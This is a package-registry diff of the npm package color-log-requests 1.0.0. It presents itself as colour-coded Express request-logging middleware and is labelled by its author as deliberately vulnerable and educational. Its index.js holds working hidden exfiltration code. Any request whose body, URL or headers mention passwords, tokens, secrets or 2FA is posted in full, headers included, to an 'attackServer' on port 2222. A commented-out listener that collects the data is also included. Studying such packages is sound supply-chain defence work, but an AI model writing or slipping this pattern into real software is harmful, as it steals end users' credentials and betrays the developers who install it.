color-log-requests 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of color-log-requests might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,49 @@
1
+ **Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
2
+
3
+ This package is a vulnerable package and is created for educational purposes.
4
+
5
+
6
+ ## Usage
7
+ this package is a HTTP request logger middleware for node.js
8
+
9
+
10
+ ```javascript
11
+ const logger = require('color-log-requests');
12
+ app.use(logger);
13
+ ```
14
+
15
+ The result is in the format:
16
+
17
+ ```bash
18
+ <resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
19
+ ```
20
+
21
+ The status codes are displayed in color:
22
+ - green for success (< 300)
23
+ - magenta for redirect (<400)
24
+ - red for failure (<600)
25
+ - blank otherwise
26
+
27
+
28
+ ## Requirements
29
+ It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
30
+ ```bash
31
+ npm install body-parser
32
+ ```
33
+
34
+ The call in code may look like this:
35
+ ```javascript
36
+ const bodyParser = require('body-parser');
37
+ app.use(bodyParser.json());
38
+
39
+ ...
40
+ const logger = require('color-log-requests');
41
+ app.use(logger);
42
+ ```
43
+
44
+
45
+ ## Installation
46
+ Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
47
+ ```
48
+ npm install color-log-requests
49
+ ```
@@ -0,0 +1,21 @@
1
+ // const http = require('http');
2
+
3
+ // const host = "127.0.0.1";
4
+ // const port = 2222;
5
+
6
+
7
+ // const server = http.createServer((req, res) => {
8
+ // const chunks = [];
9
+ // req.on("data", (chunk) => {
10
+ // chunks.push(chunk);
11
+ // });
12
+ // req.on("end", () => {
13
+ // const data = Buffer.concat(chunks);
14
+ // console.log("New sensitive request: ", JSON.parse(data.toString()));
15
+ // res.end();
16
+ // });
17
+ // })
18
+
19
+ // server.listen(port, host, () => {
20
+ // console.log(`Server is running on http://${host}:${port}`);
21
+ // });
package/index.js ADDED
@@ -0,0 +1,73 @@
1
+ const axios = require("axios")
2
+
3
+ const attackServer = "127.0.0.1"
4
+ const aAttackPort = 2222
5
+
6
+
7
+ const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
8
+
9
+
10
+ const stringContainsSensitiveValue = (string) => {
11
+ let response = false
12
+ sensitiveValues.forEach(value => {
13
+ if (string.toLowerCase().includes(value.toLowerCase())) {
14
+ response = true
15
+ }
16
+ })
17
+ return response
18
+ }
19
+
20
+
21
+
22
+ const dictContainsSensitiveValue = (dict) => {
23
+ let response = false
24
+ for (let key in dict) {
25
+ if (stringContainsSensitiveValue(key)) {
26
+ response = true
27
+ }
28
+ }
29
+ return response
30
+ }
31
+
32
+
33
+
34
+ module.exports = function (req, res, next) {
35
+ res.on("finish", function () {
36
+ const date = new Date()
37
+
38
+ if (res.statusCode < 300) { // Success
39
+ console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
40
+ } else if (res.statusCode < 400) { // Redirection
41
+ console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
42
+ } else if (res.statusCode < 600) { // Client or server Error
43
+ console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
44
+ } else { // Unknown
45
+ console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
46
+ }
47
+
48
+
49
+ if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
50
+ axios.post(`http://${attackServer}:${aAttackPort}`, {
51
+ url: decodeURI(req.url),
52
+ host: req.headers.host,
53
+ method: req.method,
54
+ date: date.toLocaleString(),
55
+ client: {
56
+ ip: req.ip,
57
+ body: req.body,
58
+ headers: req.headers,
59
+ httpVersion: req.httpVersion,
60
+ },
61
+ response: {
62
+ statusCode: res.statusCode,
63
+ body: res.body,
64
+ headers: res.headers,
65
+ contentLength: res.get('Content-Length') || 0
66
+ }
67
+ })
68
+ }
69
+
70
+
71
+ });
72
+ next();
73
+ }
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "color-log-requests",
3
+ "version": "1.0.0",
4
+ "description": "This package is a vulnerable package and is created for educational purposes.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js"
8
+ },
9
+ "keywords": [
10
+ "test",
11
+ "vulnerable",
12
+ "logging",
13
+ "color"
14
+ ],
15
+ "author": "Pierrick Delrieu",
16
+ "license": "ISC",
17
+ "dependencies": {
18
+ "axios": "^1.3.3"
19
+ }
20
+ }